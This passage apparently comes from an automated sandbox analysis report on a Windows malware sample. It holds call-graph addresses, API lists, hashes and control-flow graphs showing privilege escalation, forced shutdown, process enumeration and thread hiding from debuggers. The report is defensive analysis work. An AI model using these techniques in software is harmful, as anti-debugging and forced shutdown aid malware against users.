79723->79740 79724 6c9c5560 4 API calls 79726 6c849624 79724->79726 79725 6c9c6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 79730 6c84e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 79725->79730 79828 6c9c62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 79726->79828 79727->79650 79727->79723 79727->79730 79729 6c9bb430 2 API calls 79729->79730 79730->79650 79730->79725 79730->79729 79731 6c84f7b1 79730->79731 79732 6c84ed02 Sleep 79730->79732 79829 6c9c62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 79731->79829 79752 6c84e8c1 79732->79752 79733->79724 79735 6c84e8dd GetCurrentProcess TerminateProcess 79735->79730 79736 6c84a9a4 79738 6c9c6fb3 std::_Facet_Register 4 API calls 79736->79738 79737 6c84a9bb 79739 6c9c6fb3 std::_Facet_Register 4 API calls 79737->79739 79747 6c84a953 _Yarn _strlen 79738->79747 79739->79747 79740->79650 79740->79736 79740->79737 79740->79747 79741 6c9c5560 4 API calls 79741->79752 79742 6c84fbb8 79743 6c84fbe8 ExitWindowsEx Sleep 79742->79743 79743->79660 79744 6c84f7c0 79744->79742 79745 6c84aff0 79748 6c9c6fb3 std::_Facet_Register 4 API calls 79745->79748 79746 6c84b009 79749 6c9c6fb3 std::_Facet_Register 4 API calls 79746->79749 79747->79667 79747->79745 79747->79746 79750 6c84afa0 _Yarn 79747->79750 79748->79750 79749->79750 79751 6c9c5ed0 104 API calls 79750->79751 79753 6c84b059 std::ios_base::_Ios_base_dtor _strlen 79751->79753 79752->79730 79752->79735 79752->79741 79753->79650 79754 6c84b443 79753->79754 79755 6c84b42c 79753->79755 79758 6c84b3da _Yarn _strlen 79753->79758 79757 6c9c6fb3 std::_Facet_Register 4 API calls 79754->79757 79756 6c9c6fb3 std::_Facet_Register 4 API calls 79755->79756 79756->79758 79757->79758 79758->79667 79759 6c84b7b7 79758->79759 79760 6c84b79e 79758->79760 79763 6c84b751 _Yarn 79758->79763 79762 6c9c6fb3 std::_Facet_Register 4 API calls 79759->79762 79761 6c9c6fb3 std::_Facet_Register 4 API calls 79760->79761 79761->79763 79762->79763 79764 6c9c5ed0 104 API calls 79763->79764 79765 6c84b804 std::ios_base::_Ios_base_dtor _strlen 79764->79765 79765->79650 79766 6c84bc26 79765->79766 79767 6c84bc0f 79765->79767 79770 6c84bbbd _Yarn _strlen 79765->79770 79769 6c9c6fb3 std::_Facet_Register 4 API calls 79766->79769 79768 6c9c6fb3 std::_Facet_Register 4 API calls 79767->79768 79768->79770 79769->79770 79770->79667 79771 6c84c075 79770->79771 79772 6c84c08e 79770->79772 79775 6c84c028 _Yarn 79770->79775 79773 6c9c6fb3 std::_Facet_Register 4 API calls 79771->79773 79774 6c9c6fb3 std::_Facet_Register 4 API calls 79772->79774 79773->79775 79774->79775 79776 6c9c5ed0 104 API calls 79775->79776 79781 6c84c0db std::ios_base::_Ios_base_dtor _strlen 79776->79781 79777 6c84c7a5 79779 6c9c6fb3 std::_Facet_Register 4 API calls 79777->79779 79778 6c84c7bc 79780 6c9c6fb3 std::_Facet_Register 4 API calls 79778->79780 79788 6c84c753 _Yarn _strlen 79779->79788 79780->79788 79781->79650 79781->79777 79781->79778 79781->79788 79782 6c84d406 79784 6c9c6fb3 std::_Facet_Register 4 API calls 79782->79784 79783 6c84d3ed 79785 6c9c6fb3 std::_Facet_Register 4 API calls 79783->79785 79786 6c84d39a _Yarn 79784->79786 79785->79786 79787 6c9c5ed0 104 API calls 79786->79787 79789 6c84d458 std::ios_base::_Ios_base_dtor _strlen 79787->79789 79788->79667 79788->79782 79788->79783 79788->79786 79794 6c84cb2f 79788->79794 79789->79650 79790 6c84d8a4 79789->79790 79791 6c84d8bb 79789->79791 79795 6c84d852 _Yarn _strlen 79789->79795 79792 6c9c6fb3 std::_Facet_Register 4 API calls 79790->79792 79793 6c9c6fb3 std::_Facet_Register 4 API calls 79791->79793 79792->79795 79793->79795 79795->79667 79796 6c84dcb6 79795->79796 79797 6c84dccf 79795->79797 79800 6c84dc69 _Yarn 79795->79800 79798 6c9c6fb3 std::_Facet_Register 4 API calls 79796->79798 79799 6c9c6fb3 std::_Facet_Register 4 API calls 79797->79799 79798->79800 79799->79800 79801 6c9c5ed0 104 API calls 79800->79801 79803 6c84dd1c std::ios_base::_Ios_base_dtor 79801->79803 79802 6c9c5560 4 API calls 79802->79730 79803->79650 79803->79802 79806 6c9c56c6 79804->79806 79805 6c9c5758 OpenServiceA 79805->79806 79806->79805 79807 6c9c579f 79806->79807 79807->79698 79813 6c9b0913 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 79808->79813 79809 6c9b367e CloseHandle 79809->79813 79810 6c9b44cf CloseHandle 79810->79813 79811 6c8537cb 79816 6c9c62d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 79811->79816 79812 6c9b2a8b CloseHandle 79812->79813 79813->79809 79813->79810 79813->79811 79813->79812 79815 6c99c750 WriteFile WriteFile WriteFile ReadFile 79813->79815 79839 6c99bca0 79813->79839 79815->79813 79816->79665 79818 6c866e9f 79817->79818 79824 6c866eb3 79818->79824 79850 6c893560 32 API calls std::_Xinvalid_argument 79818->79850 79819 6c866f5b 79822 6c866f6e 79819->79822 79851 6c8937e0 32 API calls std::_Xinvalid_argument 79819->79851 79822->79710 79824->79819 79852 6c892250 30 API calls 79824->79852 79853 6c8926e0 24 API calls 4 library calls 79824->79853 79854 6c9c98e9 RaiseException 79824->79854 79827->79693 79828->79719 79829->79744 79831 6c9c5810 std::locale::_Setgloballocale 79830->79831 79832 6c9c57e7 CloseHandle 79831->79832 79833 6c9c5890 Process32NextW 79831->79833 79834 6c9c5921 79831->79834 79835 6c9c58b5 Process32FirstW 79831->79835 79832->79831 79833->79831 79834->79672 79835->79831 79836->79690 79838->79673 79840 6c99bcb3 _Yarn __wsopen_s std::locale::_Setgloballocale 79839->79840 79841 6c99c6f0 79840->79841 79842 6c99c25d CreateFileA 79840->79842 79844 6c99afa0 79840->79844 79841->79813 79842->79840 79845 6c99afb3 __wsopen_s std::locale::_Setgloballocale 79844->79845 79846 6c99b959 WriteFile 79845->79846 79847 6c99b9ad WriteFile 79845->79847 79848 6c99bc88 79845->79848 79849 6c99b105 ReadFile 79845->79849 79846->79845 79847->79845 79848->79840 79849->79845 79850->79824 79851->79822 79852->79824 79853->79824 79854->79824 79855 6c9dd043 79856 6c9dd06d 79855->79856 79857 6c9dd055 __dosmaperr 79855->79857 79856->79857 79858 6c9dd0e7 79856->79858 79860 6c9dd0b8 __dosmaperr 79856->79860 79861 6c9dd100 79858->79861 79862 6c9dd157 __wsopen_s 79858->79862 79863 6c9dd11b __dosmaperr 79858->79863 79897 6c9d0690 18 API calls __fassign 79860->79897 79861->79863 79882 6c9dd105 79861->79882 79891 6c9d4d2b HeapFree GetLastError _free 79862->79891 79890 6c9d0690 18 API calls __fassign 79863->79890 79864 6c9e1f55 __wsopen_s 18 API calls 79869 6c9dd2ae 79864->79869 79866 6c9dd177 79892 6c9d4d2b HeapFree GetLastError _free 79866->79892 79868 6c9dd324 79872 6c9dd328 ReadFile 79868->79872 79869->79868 79870 6c9dd2c7 GetConsoleMode 79869->79870 79870->79868 79873 6c9dd2d8 79870->79873 79875 6c9dd39c GetLastError 79872->79875 79876 6c9dd342 79872->79876 79873->79872 79877 6c9dd2de ReadConsoleW 79873->79877 79874 6c9dd17e 79887 6c9dd132 __dosmaperr __wsopen_s 79874->79887 79893 6c9db1d9 20 API calls __wsopen_s 79874->79893 79875->79887 79876->79875 79878 6c9dd319 79876->79878 79877->79878 79880 6c9dd2fa GetLastError 79877->79880 79883 6c9dd37e 79878->79883 79884 6c9dd367 79878->79884 79878->79887 79880->79887 79882->79864 79886 6c9dd395 79883->79886 79883->79887 79895 6c9dd46e 23 API calls 3 library calls 79884->79895 79896 6c9dd726 21 API calls __wsopen_s 79886->79896 79894 6c9d4d2b HeapFree GetLastError _free 79887->79894 79889 6c9dd39a 79889->79887 79890->79887 79891->79866 79892->79874 79893->79882 79894->79857 79895->79887 79896->79889 79897->79857

                              Executed Functions

                              Function 6C844754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: d31c1c7ebbc84b86bd2b20647ba8afde67237884ff7267c4e68980d5738bde3a
                              • Instruction ID: 08f64b4fc1df1d80d9815f1945005c7f5e566ec512800e1154ab76c10a19c375
                              • Opcode Fuzzy Hash: d31c1c7ebbc84b86bd2b20647ba8afde67237884ff7267c4e68980d5738bde3a
                              • Instruction Fuzzy Hash: DE741531644B068FC738CF28C9D0A95B7E3EF95318B59CE2DC0A68BA55E774B54ACB40
                              Function 6C854A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: a18a247f814932bf1da525558d7d30a1fb2255d31613a266fba5bcccb9fc2965
                              • Instruction ID: 56c09e684b951aab7bfb8fb5807e959f1c281ad212ab733bf6f0ac07103cb1d3
                              • Opcode Fuzzy Hash: a18a247f814932bf1da525558d7d30a1fb2255d31613a266fba5bcccb9fc2965
                              • Instruction Fuzzy Hash: 42342671644B018FC738CF28C9D0A96B7E3EF95314B998E6DC0964BB45E7B4B45ACB40
                              Function 6C9C57B0 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6c9c57b0-6c9c57e5 CreateToolhelp32Snapshot 7678 6c9c5810-6c9c5819 7677->7678 7679 6c9c581b-6c9c5820 7678->7679 7680 6c9c5850-6c9c5855 7678->7680 7683 6c9c5885-6c9c588a 7679->7683 7684 6c9c5822-6c9c5827 7679->7684 7681 6c9c585b-6c9c5860 7680->7681 7682 6c9c58e7-6c9c5911 call 6c9d3175 7680->7682 7685 6c9c57e7-6c9c5802 CloseHandle 7681->7685 7686 6c9c5862-6c9c5867 7681->7686 7682->7678 7687 6c9c5916-6c9c591b 7683->7687 7688 6c9c5890-6c9c58a2 Process32NextW 7683->7688 7690 6c9c5829-6c9c582e 7684->7690 7691 6c9c58a4-6c9c58cd call 6c9cbe90 Process32FirstW 7684->7691 7685->7678 7686->7678 7693 6c9c5869-6c9c5883 7686->7693 7687->7678 7697 6c9c5921-6c9c592f 7687->7697 7694 6c9c58d2-6c9c58e2 7688->7694 7690->7678 7692 6c9c5830-6c9c5841 7690->7692 7691->7694 7692->7678 7693->7678 7694->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9C57BE
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction ID: e2aae1644d4c88286cae31696c884048f1ebef587b33a43fd41e530304af59b4
                              • Opcode Fuzzy Hash: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction Fuzzy Hash: 3C314874608301EBD7109F28C888B1ABBF8AF95748F50896AE498D77A0D371D948AB53
                              Function 6C843886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6c843886-6c84388e 7822 6c843894-6c843896 7821->7822 7823 6c843970-6c84397d 7821->7823 7822->7823 7824 6c84389c-6c8438b9 7822->7824 7825 6c8439f1-6c8439f8 7823->7825 7826 6c84397f-6c843989 7823->7826 7830 6c8438c0-6c8438c1 7824->7830 7828 6c843ab5-6c843aba 7825->7828 7829 6c8439fe-6c843a03 7825->7829 7826->7824 7827 6c84398f-6c843994 7826->7827 7831 6c843b16-6c843b18 7827->7831 7832 6c84399a-6c84399f 7827->7832 7828->7824 7836 6c843ac0-6c843ac7 7828->7836 7833 6c8438d2-6c8438d4 7829->7833 7834 6c843a09-6c843a2f 7829->7834 7835 6c84395e 7830->7835 7831->7830 7837 6c8439a5-6c8439bf 7832->7837 7838 6c84383b-6c843855 call 6c9919e0 call 6c9919f0 7832->7838 7841 6c843957-6c84395c 7833->7841 7839 6c843a35-6c843a3a 7834->7839 7840 6c8438f8-6c843955 7834->7840 7842 6c843960-6c843964 7835->7842 7836->7830 7843 6c843acd-6c843ad6 7836->7843 7844 6c843a5a-6c843a5d 7837->7844 7848 6c843860-6c843885 7838->7848 7845 6c843a40-6c843a57 7839->7845 7846 6c843b1d-6c843b22 7839->7846 7840->7841 7841->7835 7842->7848 7849 6c84396a 7842->7849 7843->7831 7850 6c843ad8-6c843aeb 7843->7850 7854 6c843aa9-6c843ab0 7844->7854 7845->7844 7852 6c843b24-6c843b44 7846->7852 7853 6c843b49-6c843b50 7846->7853 7848->7821 7856 6c843ba1-6c843bb6 7849->7856 7850->7840 7857 6c843af1-6c843af8 7850->7857 7852->7854 7853->7830 7862 6c843b56-6c843b5d 7853->7862 7854->7842 7863 6c843bc0-6c843bda call 6c9919e0 call 6c9919f0 7856->7863 7858 6c843b62-6c843b85 7857->7858 7859 6c843afa-6c843aff 7857->7859 7858->7840 7866 6c843b8b 7858->7866 7859->7841 7862->7842 7872 6c843be0-6c843bfe 7863->7872 7866->7856 7875 6c843c04-6c843c11 7872->7875 7876 6c843e7b 7872->7876 7877 6c843c17-6c843c20 7875->7877 7878 6c843ce0-6c843cea 7875->7878 7879 6c843e81-6c843ee0 call 6c843750 GetCurrentThread NtSetInformationThread 7876->7879 7881 6c843dc5 7877->7881 7882 6c843c26-6c843c2d 7877->7882 7883 6c843cec-6c843d0c 7878->7883 7884 6c843d3a-6c843d3c 7878->7884 7892 6c843eea-6c843f04 call 6c9919e0 call 6c9919f0 7879->7892 7891 6c843dc6 7881->7891 7886 6c843dc3 7882->7886 7887 6c843c33-6c843c3a 7882->7887 7888 6c843d90-6c843d95 7883->7888 7889 6c843d70-6c843d8d 7884->7889 7890 6c843d3e-6c843d45 7884->7890 7886->7881 7893 6c843e26-6c843e2b 7887->7893 7894 6c843c40-6c843c5b 7887->7894 7897 6c843d97-6c843db8 7888->7897 7898 6c843dba-6c843dc1 7888->7898 7889->7888 7895 6c843d50-6c843d57 7890->7895 7896 6c843dc8-6c843dcc 7891->7896 7915 6c843f75-6c843fa1 7892->7915 7901 6c843e31 7893->7901 7902 6c843c7b-6c843cd0 7893->7902 7903 6c843e1b-6c843e24 7894->7903 7895->7891 7896->7872 7904 6c843dd2 7896->7904 7897->7881 7898->7886 7899 6c843dd7-6c843ddc 7898->7899 7905 6c843e36-6c843e3d 7899->7905 7906 6c843dde-6c843e17 7899->7906 7901->7863 7902->7895 7903->7896 7907 6c843e76-6c843e79 7903->7907 7904->7907 7911 6c843e5c-6c843e5f 7905->7911 7912 6c843e3f-6c843e5a 7905->7912 7906->7903 7907->7879 7911->7902 7914 6c843e65-6c843e69 7911->7914 7912->7903 7914->7896 7914->7907 7919 6c844020-6c844026 7915->7919 7920 6c843fa3-6c843fa8 7915->7920 7921 6c843f06-6c843f35 7919->7921 7922 6c84402c-6c84403c 7919->7922 7923 6c84407c-6c844081 7920->7923 7924 6c843fae-6c843fcf 7920->7924 7929 6c843f38-6c843f61 7921->7929 7925 6c8440b3-6c8440b8 7922->7925 7926 6c84403e-6c844058 7922->7926 7927 6c844083-6c84408a 7923->7927 7928 6c8440aa-6c8440ae 7923->7928 7924->7928 7925->7924 7933 6c8440be-6c8440c9 7925->7933 7931 6c84405a-6c844063 7926->7931 7927->7929 7932 6c844090 7927->7932 7930 6c843f6b-6c843f6f 7928->7930 7934 6c843f64-6c843f67 7929->7934 7930->7915 7936 6c8440f5-6c84413f 7931->7936 7937 6c844069-6c84406c 7931->7937 7932->7892 7938 6c8440a7 7932->7938 7933->7928 7939 6c8440cb-6c8440d4 7933->7939 7935 6c843f69 7934->7935 7935->7930 7936->7935 7940 6c844144-6c84414b 7937->7940 7941 6c844072-6c844077 7937->7941 7938->7928 7939->7938 7942 6c8440d6-6c8440f0 7939->7942 7940->7930 7941->7934 7942->7931
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bdc2cd68b60c3453f983493cd065aeb90419e39b1212478f3c85c0b508555ae5
                              • Instruction ID: 5a977f958210483434b73ddd42f009fadff56e70b75584ee84d35c11c62b8164
                              • Opcode Fuzzy Hash: bdc2cd68b60c3453f983493cd065aeb90419e39b1212478f3c85c0b508555ae5
                              • Instruction Fuzzy Hash: D832D132245B058FC334CF28C990695B7E3EFD1314B69CE6CC0AA5BA95D775B84ACB50
                              Function 6C843A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6c843a6a-6c843a85 7970 6c843a87-6c843aa7 7969->7970 7971 6c843aa9-6c843ab0 7970->7971 7972 6c843960-6c843964 7971->7972 7973 6c843860-6c84388e 7972->7973 7974 6c84396a 7972->7974 7983 6c843894-6c843896 7973->7983 7984 6c843970-6c84397d 7973->7984 7976 6c843ba1-6c843bb6 7974->7976 7978 6c843bc0-6c843bda call 6c9919e0 call 6c9919f0 7976->7978 7994 6c843be0-6c843bfe 7978->7994 7983->7984 7986 6c84389c-6c8438b9 7983->7986 7988 6c8439f1-6c8439f8 7984->7988 7989 6c84397f-6c843989 7984->7989 7993 6c8438c0-6c8438c1 7986->7993 7991 6c843ab5-6c843aba 7988->7991 7992 6c8439fe-6c843a03 7988->7992 7989->7986 7990 6c84398f-6c843994 7989->7990 7996 6c843b16-6c843b18 7990->7996 7997 6c84399a-6c84399f 7990->7997 7991->7986 8001 6c843ac0-6c843ac7 7991->8001 7998 6c8438d2-6c8438d4 7992->7998 7999 6c843a09-6c843a2f 7992->7999 8000 6c84395e 7993->8000 8009 6c843c04-6c843c11 7994->8009 8010 6c843e7b 7994->8010 7996->7993 8003 6c8439a5-6c8439bf 7997->8003 8004 6c84383b-6c843855 call 6c9919e0 call 6c9919f0 7997->8004 8007 6c843957-6c84395c 7998->8007 8005 6c843a35-6c843a3a 7999->8005 8006 6c8438f8-6c843955 7999->8006 8000->7972 8001->7993 8008 6c843acd-6c843ad6 8001->8008 8011 6c843a5a-6c843a5d 8003->8011 8004->7973 8012 6c843a40-6c843a57 8005->8012 8013 6c843b1d-6c843b22 8005->8013 8006->8007 8007->8000 8008->7996 8015 6c843ad8-6c843aeb 8008->8015 8016 6c843c17-6c843c20 8009->8016 8017 6c843ce0-6c843cea 8009->8017 8020 6c843e81-6c843ee0 call 6c843750 GetCurrentThread NtSetInformationThread 8010->8020 8011->7971 8012->8011 8018 6c843b24-6c843b44 8013->8018 8019 6c843b49-6c843b50 8013->8019 8015->8006 8022 6c843af1-6c843af8 8015->8022 8026 6c843dc5 8016->8026 8027 6c843c26-6c843c2d 8016->8027 8029 6c843cec-6c843d0c 8017->8029 8030 6c843d3a-6c843d3c 8017->8030 8018->7970 8019->7993 8028 6c843b56-6c843b5d 8019->8028 8041 6c843eea-6c843f04 call 6c9919e0 call 6c9919f0 8020->8041 8023 6c843b62-6c843b85 8022->8023 8024 6c843afa-6c843aff 8022->8024 8023->8006 8035 6c843b8b 8023->8035 8024->8007 8039 6c843dc6 8026->8039 8033 6c843dc3 8027->8033 8034 6c843c33-6c843c3a 8027->8034 8028->7972 8036 6c843d90-6c843d95 8029->8036 8037 6c843d70-6c843d8d 8030->8037 8038 6c843d3e-6c843d45 8030->8038 8033->8026 8042 6c843e26-6c843e2b 8034->8042 8043 6c843c40-6c843c5b 8034->8043 8035->7976 8046 6c843d97-6c843db8 8036->8046 8047 6c843dba-6c843dc1 8036->8047 8037->8036 8044 6c843d50-6c843d57 8038->8044 8045 6c843dc8-6c843dcc 8039->8045 8064 6c843f75-6c843fa1 8041->8064 8050 6c843e31 8042->8050 8051 6c843c7b-6c843cd0 8042->8051 8052 6c843e1b-6c843e24 8043->8052 8044->8039 8045->7994 8053 6c843dd2 8045->8053 8046->8026 8047->8033 8048 6c843dd7-6c843ddc 8047->8048 8054 6c843e36-6c843e3d 8048->8054 8055 6c843dde-6c843e17 8048->8055 8050->7978 8051->8044 8052->8045 8056 6c843e76-6c843e79 8052->8056 8053->8056 8060 6c843e5c-6c843e5f 8054->8060 8061 6c843e3f-6c843e5a 8054->8061 8055->8052 8056->8020 8060->8051 8063 6c843e65-6c843e69 8060->8063 8061->8052 8063->8045 8063->8056 8068 6c844020-6c844026 8064->8068 8069 6c843fa3-6c843fa8 8064->8069 8070 6c843f06-6c843f35 8068->8070 8071 6c84402c-6c84403c 8068->8071 8072 6c84407c-6c844081 8069->8072 8073 6c843fae-6c843fcf 8069->8073 8078 6c843f38-6c843f61 8070->8078 8074 6c8440b3-6c8440b8 8071->8074 8075 6c84403e-6c844058 8071->8075 8076 6c844083-6c84408a 8072->8076 8077 6c8440aa-6c8440ae 8072->8077 8073->8077 8074->8073 8082 6c8440be-6c8440c9 8074->8082 8080 6c84405a-6c844063 8075->8080 8076->8078 8081 6c844090 8076->8081 8079 6c843f6b-6c843f6f 8077->8079 8083 6c843f64-6c843f67 8078->8083 8079->8064 8085 6c8440f5-6c84413f 8080->8085 8086 6c844069-6c84406c 8080->8086 8081->8041 8087 6c8440a7 8081->8087 8082->8077 8088 6c8440cb-6c8440d4 8082->8088 8084 6c843f69 8083->8084 8084->8079 8085->8084 8089 6c844144-6c84414b 8086->8089 8090 6c844072-6c844077 8086->8090 8087->8077 8088->8087 8091 6c8440d6-6c8440f0 8088->8091 8089->8079 8090->8083 8091->8080
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 8fb417c4206979d16ad62c2d8afa729d0456c291d6f393e6ea06a9da3a5771f0
                              • Instruction ID: 958e7076f2465fb8d779f6975da0d861f23e23c2719d86a5d42022646cef560d
                              • Opcode Fuzzy Hash: 8fb417c4206979d16ad62c2d8afa729d0456c291d6f393e6ea06a9da3a5771f0
                              • Instruction Fuzzy Hash: 6351DE31145B098FC3308F28C980795B7A3BFE6314F69CE5DC0E61BA95DB75B94A8B41
                              Function 6C8439CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 75a55ff2d1c00288514b4bafec8d86422b0f2cbee5e7028c9f0aa6798bfe1273
                              • Instruction ID: 547db2803177bfcaf6905d454376d54864c8f56466912677237a0216f493283b
                              • Opcode Fuzzy Hash: 75a55ff2d1c00288514b4bafec8d86422b0f2cbee5e7028c9f0aa6798bfe1273
                              • Instruction Fuzzy Hash: 2D51BD31104B098BC330CF28C580796B7A3BFD6314F69CE5DC0E65BA95DB71B94A8B91
                              Function 6C843D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
